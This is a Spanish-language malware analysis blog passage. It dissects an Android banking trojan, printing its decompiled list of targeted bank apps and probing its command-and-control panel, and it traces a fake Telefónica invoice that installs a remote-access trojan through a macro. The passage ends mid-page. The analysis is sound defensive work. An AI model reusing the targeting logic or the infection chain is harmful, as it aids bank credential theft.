<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqOuxs4_Fk6m1OeKAGkuuQ6uvLU-DWf4r4HUCOT6KQkuxK0Yk2UeWsulZf-0HC40PDcQtMa3QQdlJffegXaji3ngUp68z2XhtfFMlalCve8G0mx9nMgbf7NfYkaE6MRzlua3dK9k3ZX80/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="279" data-original-width="1121" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqOuxs4_Fk6m1OeKAGkuuQ6uvLU-DWf4r4HUCOT6KQkuxK0Yk2UeWsulZf-0HC40PDcQtMa3QQdlJffegXaji3ngUp68z2XhtfFMlalCve8G0mx9nMgbf7NfYkaE6MRzlua3dK9k3ZX80/s320/8.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Revisamos el malware con dex2jar-2.0, lo decompilamos, con esto pude observar el listado de app bancarias que son monitoreadas por el malware para luego presentar falsos formularios y capturar las claves bancarias, por otro lado también tiene la potestad de interferir los SMS por lo que podría obtener los tokens de seguridad o avisos que envié el banco afectado hacia la victima.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Log.d("INVISIBLE-LOG", "SEARCH BANK CLIENT'S");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.sberbankmobile"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.sberbank_sbbol"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.alfabank.mobile.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.alfabank.oavdo.amc"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.mw"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.raiffeisennews"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.idamob.tinkoff.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.paypal.android.p2pmobile"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.webmoney.my"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.rosbank.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.vtb24.mobilebanking.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.simpls.mbrd.ui"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.yandex.money"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.com.cs.ifobs.mobile.android.sbrf"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.privatbank.ap24"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.simpls.brs2.mobbank"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.ubanksu"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.alseda.ideabank"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("pl.pkobp.iko"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.bank.sms"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.com.cs.ifobs.mobile.android.otp"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.vtb.client.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.oschadbank.online"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.trinetix.platinum"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("hr.asseco.android.jimba.mUCI.ua"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.pentegy.avalbank.production"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.ukrgazbank.UGBCardM"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (!</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">((ApplicationInfo)localObject2).packageName.equals("com.coformatique.starmobile.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|SberB_RU|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|AlfaB_RU|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|QIWI|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|R-CONNECT|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Tinkoff|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|paypal|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|webmoney|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|RosBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|MTS BANK|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|VTB24|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Yandex Bank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|SberB_UA|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Privat24|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|RussStandart|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Idea_Bank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Iko_Bank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Bank_SMS|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|OTP Smart|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|VTB_ua|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|OschadBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|PlatinumBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UniCreditBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|aval_bank_ua|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UKRGASBANK|</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UKRSIBBANK| </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Instale en el emulador infectado la app de una entidad de rusia (SberB_RU) y aunque parezca mentira, esta app detecto en el dispositivo el malware.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5hoVl1mRy5-uqwz4ONsXBN4b-F1mt8f1BjT2qPUF1X78WD7D40uT7vwNCCwXKRmYTNst6Q9EPNRirswMKCIYgAeXX7Yh1XGQtAuxh-aiB0r_soqKoM9gXf2WOQHBzaws1Ia59JjeytA/s1600/22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="443" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5hoVl1mRy5-uqwz4ONsXBN4b-F1mt8f1BjT2qPUF1X78WD7D40uT7vwNCCwXKRmYTNst6Q9EPNRirswMKCIYgAeXX7Yh1XGQtAuxh-aiB0r_soqKoM9gXf2WOQHBzaws1Ia59JjeytA/s400/22.jpg" width="242" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Por otro lado empezamos a probar el sitio de C2 a ver si podemos obtener algo mas. Y pude observar que existen formularios que no están securizados por lo que es posible accederlos y obtener mas información :D</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">En el momento de accederlo solo había un IMEI.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixRwGHhQhURIXjShO9S4KrBmRRCU2wmCVvZALSwNafLo9O4WQWI_3Q_dNAt3H8erkXIxrR1nmb7tvSSwnl0rexbIBGb6ca64jSn4LSLfZU1YFkVpJc1j3lU_NgJiQlleiYKf6xONvSLFU/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="975" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixRwGHhQhURIXjShO9S4KrBmRRCU2wmCVvZALSwNafLo9O4WQWI_3Q_dNAt3H8erkXIxrR1nmb7tvSSwnl0rexbIBGb6ca64jSn4LSLfZU1YFkVpJc1j3lU_NgJiQlleiYKf6xONvSLFU/s320/09.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí podemos ver que mi sistema infectado y su reporte al Comando y control.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHl2qO357A9kB0DDdRLAb2SobGrMA9sTiap-BaQy4c5ONXmB6R2d6IcACjfZjdTPnPts2GU640grncjK0cAI-CJtOyAS6k__fN3GypZGU5aaJptDK4RAzEWAK77rmx4Ew5ouB-_a-2_ps/s1600/21..jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="646" data-original-width="1337" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHl2qO357A9kB0DDdRLAb2SobGrMA9sTiap-BaQy4c5ONXmB6R2d6IcACjfZjdTPnPts2GU640grncjK0cAI-CJtOyAS6k__fN3GypZGU5aaJptDK4RAzEWAK77rmx4Ew5ouB-_a-2_ps/s640/21..jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">En Bank se puede observar que el malware detecto que tenemos instalado la app del SeberB y Paypal.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYPK8CYmk1CNTqBgUov3oAN5H7rCzPG7NOJ2q6sdDLK1esHQY23nbqdkara4KrjQtsaEBjqSShppOqJl_OmzsspM2xdJ3568azKxjDOTy7VJSwwHg8DU0cWYrZ2-uNnM3p_Amr5saE2U8/s1600/infect.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="127" data-original-width="180" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYPK8CYmk1CNTqBgUov3oAN5H7rCzPG7NOJ2q6sdDLK1esHQY23nbqdkara4KrjQtsaEBjqSShppOqJl_OmzsspM2xdJ3568azKxjDOTy7VJSwwHg8DU0cWYrZ2-uNnM3p_Amr5saE2U8/s400/infect.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Panel de login del C2</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoWX0gM2Wpyt6IebA7IrEKVypO79xin4MGfbQeWeKNAZQDfNj_cTgtmbBQgESwsJPpTfKMc3JGejGSMKAcgfq8REv8pmU45WiVN1d1AH64JpqoPJQt73CqNklQdxqrgsD0SMmS-bxpZdA/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="358" data-original-width="732" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoWX0gM2Wpyt6IebA7IrEKVypO79xin4MGfbQeWeKNAZQDfNj_cTgtmbBQgESwsJPpTfKMc3JGejGSMKAcgfq8REv8pmU45WiVN1d1AH64JpqoPJQt73CqNklQdxqrgsD0SMmS-bxpZdA/s640/10.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizHLJu6ThOUr-m_iLcOD797QMedCscPApzB-XWyPhhyf8rxMs3gTNsCZ82jCJVmj7pd3W3LScK03cUGr6hgHhalhhK5MEzZawshWYgiqAN1uWy605YQnY7gBlqAiP-cV5x7Yr2hwty5VA/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="1253" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizHLJu6ThOUr-m_iLcOD797QMedCscPApzB-XWyPhhyf8rxMs3gTNsCZ82jCJVmj7pd3W3LScK03cUGr6hgHhalhhK5MEzZawshWYgiqAN1uWy605YQnY7gBlqAiP-cV5x7Yr2hwty5VA/s640/11.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Recomendación, revisar los permisos de las app antes de instalarlas, no tomar mucho en cuenta la puntuaciones positivas de las app debido a que muchos de estos puntos positivos pueden ser falsos, u obtenidos mediante el bombardeo de propagandas y mensaje agresivos contra los usuarios. Por ultimo contar con un antivirus en el terminal.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://koodous.com/apks/1584174767c12ec6896a7cda9ca0656205e2bece916445b2d6e145fb0ae3cb06">Muestra</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: arial, helvetica, sans-serif; font-size: 13px;">Es todo por el momento @Dkavalanche 2017</span></div>
<br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-40481687562616291552017-04-28T11:00:00.002-07:002017-04-28T11:00:18.563-07:00<b>Falsa Factura electrónica de Telefónica Arg. Descarga Troyano<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"> (Darktrack Alien RAT)</span></b><br />
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;">Me llamo mucho la atención el<a href="https://twitter.com/rfb_/status/850353115350147076"> aviso</a> de Raúl en su twitter, por lo que pasamos a verlo.</span><br />
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;">El correo phishing, es una copia a la factura digital de Telefónica Argentina, con el link de descarga que apunta a un documento .DOC alojado en Dropbox.</span></span><br />
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;"><br /></span></span>
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;"><br /></span></span>
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;">Una vez abierto el documento nos indica que debemos habilitar el contenido para que se ejecute la macro auto-open</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfw6Dosc60oTQ7bFG0-h33YZt3PPku6eQSpiyey9EnAmVBFBO21gxTObUEKbp6ivqTBNriWl_pwuTgIY1yBes2DbEi_0IDQxEGGqA15cf-QYF12nHnnrD4zSQlVWko4HG-QZv3L7HCCok/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfw6Dosc60oTQ7bFG0-h33YZt3PPku6eQSpiyey9EnAmVBFBO21gxTObUEKbp6ivqTBNriWl_pwuTgIY1yBes2DbEi_0IDQxEGGqA15cf-QYF12nHnnrD4zSQlVWko4HG-QZv3L7HCCok/s400/00.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La macro, abre una imagen falsa y ejecuta un .v<span style="background-color: white;">bs en el <span style="color: #333333; white-space: pre-wrap;">%appdata%</span>/temp y termina eje</span>cutando un .exe que esta </span><span style="font-family: Arial, Helvetica, sans-serif;">hardcodeado en el vbs.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMWLoR-G1O8gdy1HLNjkKOBzxRZx005FCkoGDzERmJ3kZD09CQRJXrVXYR0MjAX7a-52ki0wD9BKm_uCLnrjvpah5eorx-1Fk5eSCrvnC24xRiUQdA5LJ9UmuYFquW8s9d0Go58IL0TJQ/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMWLoR-G1O8gdy1HLNjkKOBzxRZx005FCkoGDzERmJ3kZD09CQRJXrVXYR0MjAX7a-52ki0wD9BKm_uCLnrjvpah5eorx-1Fk5eSCrvnC24xRiUQdA5LJ9UmuYFquW8s9d0Go58IL0TJQ/s640/01.jpg" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQI712pXQMM-WlcUYnBX21Yzt66FK5rx0h9ZcW1iQNxdK3Q0FKO1miNqxeoGhsiyz9YWAf_gt-WQ6QDLnA7zFUDfsjmfQreqfX8HOCnHr3uaQakwCl6OdgeN9jtDQh7faRUekgUQC2WZU/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="404" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQI712pXQMM-WlcUYnBX21Yzt66FK5rx0h9ZcW1iQNxdK3Q0FKO1miNqxeoGhsiyz9YWAf_gt-WQ6QDLnA7zFUDfsjmfQreqfX8HOCnHr3uaQakwCl6OdgeN9jtDQh7faRUekgUQC2WZU/s640/04.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Este ejecutable descomprime dos amenazas.</span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí vemos la persistencia en el sistema</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6cZ3D1cWAgyiwR0lP7KrCLMmHF66rTRbudMLQ4HD5SirfP_0O_gbzF7w_X2SfuBAdccw5hxNlqNgLa1d16OwUqk12MW29H7faVpcsqd5Q4KQ0kKQZF3TWZc3jcY6pAxMX2QF_Rkas_Tg/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6cZ3D1cWAgyiwR0lP7KrCLMmHF66rTRbudMLQ4HD5SirfP_0O_gbzF7w_X2SfuBAdccw5hxNlqNgLa1d16OwUqk12MW29H7faVpcsqd5Q4KQ0kKQZF3TWZc3jcY6pAxMX2QF_Rkas_Tg/s640/05.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">https://www.virustotal.com/es/file/68dfe14103ffa2befb39d8bda4bd65e09eff90de6b2c203e6ba5a7810053c089/analysis/1491585453/</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">https://www.virustotal.com/es/file/d4ba451fae6310e27806d10e5835f08263a8c5f0308fa1eaa151870a1c3f154a/analysis/1491585564/</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La amenaza se inyecta en un proceso Notepad.exe</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx5xGqJ5E7RTVEBJHL9gqfmGLnt3OJWRJ3HZQbAB9B8JzsT4QcYGo21CIUx6yW-PP6p04ko0KKwKNXru5zC3Fn28GGxyoxq1FlwgEv2V2_rI9LTkoIKfjCIjJOdTv2YypGVF4vxxCSQYI/s1600/c%2526c2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx5xGqJ5E7RTVEBJHL9gqfmGLnt3OJWRJ3HZQbAB9B8JzsT4QcYGo21CIUx6yW-PP6p04ko0KKwKNXru5zC3Fn28GGxyoxq1FlwgEv2V2_rI9LTkoIKfjCIjJOdTv2YypGVF4vxxCSQYI/s640/c%2526c2.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Strings interesantes</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3xlXGbhWWdke4hwTBUmT2GOQo7k_Ao_p4mvHiyuzIsu0pOFwDnI-twCpbPUkRIkX8rGlJRF2LnMeC8E3tOQtf3Pwp2dW77MZU20w8DYshNCHJe3rNTlSi4UqpRRcAWtJNT3pkGl_L4E0/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3xlXGbhWWdke4hwTBUmT2GOQo7k_Ao_p4mvHiyuzIsu0pOFwDnI-twCpbPUkRIkX8rGlJRF2LnMeC8E3tOQtf3Pwp2dW77MZU20w8DYshNCHJe3rNTlSi4UqpRRcAWtJNT3pkGl_L4E0/s640/06.jpg" width="640" /></a></div>
<br />
<br />
<br />
080IAM010010DAR8K89TR3SDTACK<br />
<span style="color: red;"><b>4.1 Alien+</b></span><br />
Local User<br />
123456<br />
127.0.0.1<br />
notepad.exe<br />
SYSTEMROOT<br />
WINDIR<br />
APPDATA<br />
ZYYd<br />
(D@<br />
TClientSocket<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Todo indicaría que se trata del siguiente RAT</span><br />
<br />
www[.]nulled[.]to[/]topic[/]186564-darktrack-41-alien-legit-verion-remote-admin-tool/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEpZ2y7HMlNvgwTBiDTaph9eqcemOqTNZP3aQY3wZSXRuzF054WjZBj0IsHJYNHpqc0G_yQc7DZZiduYK0JhTdV3K_8ce5pK8vJC1NbJorEvivcDlhzjrMvuU_7om0V_6ma16pf2kV6s4/s1600/aliendark.jpg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEpZ2y7HMlNvgwTBiDTaph9eqcemOqTNZP3aQY3wZSXRuzF054WjZBj0IsHJYNHpqc0G_yQc7DZZiduYK0JhTdV3K_8ce5pK8vJC1NbJorEvivcDlhzjrMvuU_7om0V_6ma16pf2kV6s4/s400/aliendark.jpg.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"> Comunicación con el C&C </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
